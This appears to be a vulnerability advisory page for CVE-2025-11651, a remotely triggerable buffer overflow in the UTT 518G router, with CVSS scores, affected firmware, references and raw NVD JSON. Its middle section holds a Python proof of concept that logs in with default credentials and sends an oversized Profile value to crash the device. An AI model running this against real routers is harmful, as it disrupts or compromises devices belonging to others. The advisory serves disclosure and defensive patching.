CVE-2025-11651

Description

A vulnerability has been found in UTT 进取 518G up to V3v3.2.7-210919-161313. This vulnerability affects the function sub_4247AC of the file /goform/formRemoteControl. The manipulation of the argument Profile leads to buffer overflow. The attack is possible to be carried out remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score

8.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:utt:518g_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:utt:518g:3.0:*:*:*:*:*:*:* - NOT VULNERABLE

UTT 进取 518G ≤ V3v3.2.7-210919-161313

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-11651 PoC - UTT 518G Router Buffer Overflow
# Vulnerability: Buffer overflow in sub_4247AC via Profile parameter
# Endpoint: /goform/formRemoteControl

import requests
import sys

TARGET = "http://192.168.1.1"  # Default router IP, modify as needed
AUTH_USER = "admin"
AUTH_PASS = "admin"  # Default credentials or obtained low-privilege credentials

def exploit(target, username, password):
    """
    Exploit buffer overflow in UTT 518G formRemoteControl endpoint.
    The Profile parameter is not properly validated, allowing buffer overflow.
    """
    session = requests.Session()

    # Step 1: Authenticate to obtain low-privilege session
    login_url = f"{target}/goform/login"
    login_data = {
        "username": username,
        "password": password
    }
    session.post(login_url, data=login_data)

    # Step 2: Trigger buffer overflow via Profile parameter
    vuln_url = f"{target}/goform/formRemoteControl"

    # Malicious payload - oversized Profile parameter to overflow buffer
    # Adjust payload size based on the buffer length in sub_4247AC
    payload = "A" * 4096  # Overflow payload

    overflow_data = {
        "Profile": payload
    }

    print(f"[*] Sending exploit to {vuln_url}")
    try:
        response = session.post(vuln_url, data=overflow_data, timeout=10)
        print(f"[*] Response status: {response.status_code}")
        if response.status_code == 500 or "error" in response.text.lower():
            print("[+] Target appears vulnerable (crash detected)")
    except requests.exceptions.Timeout:
        print("[+] Target appears vulnerable (timeout/crash detected)")
    except requests.exceptions.ConnectionError:
        print("[+] Target appears vulnerable (connection refused - crash)")
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else TARGET
    exploit(target, AUTH_USER, AUTH_PASS)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-11651
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-11651
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-11651/
[4] VulDB https://vuldb.com/cve/CVE-2025-11651
[5] https://github.com/cymiao1978/cve/blob/main/13.md
[6] https://github.com/cymiao1978/cve/blob/main/13.md#poc
[7] https://vuldb.com/?ctiid.328068
[8] https://vuldb.com/?id.328068
[9] https://vuldb.com/?submit.664925

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-11651", "sourceIdentifier": "[email protected]", "published": "2025-10-13T00:15:33.753", "lastModified": "2026-01-08T18:00:50.647", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been found in UTT 进取 518G up to V3v3.2.7-210919-161313. This vulnerability affects the function sub_4247AC of the file /goform/formRemoteControl. The manipulation of the argument Profile leads to buffer overflow. The attack is possible to be carried out remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.4, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "baseScore": 9.0, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "availabilityImpact": "COMPLETE"}, "baseSeverity": "HIGH", "exploitabilityScore": 8.0, "impactScore": 10.0, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}, {"lang": "en", "value": "CWE-120"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:utt:518g_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "3.2.7-210919-161313", "matchCriteriaId": "9D83D3FD-34F4-4FBE-A83A-99AA21B91450"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:utt:518g:3.0:*:*:*:*:*:*:*", "matchCriteriaId": "4BADC9D6-20DE-466B-AEC1-278B8CC49BEC"}]}]}], "references": [{"url": "https://github.com/cymiao1978/cve/blob/main/13.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/cymiao1978/cve/blob/main/13.md#poc", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.328068", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.328068", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.664925", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}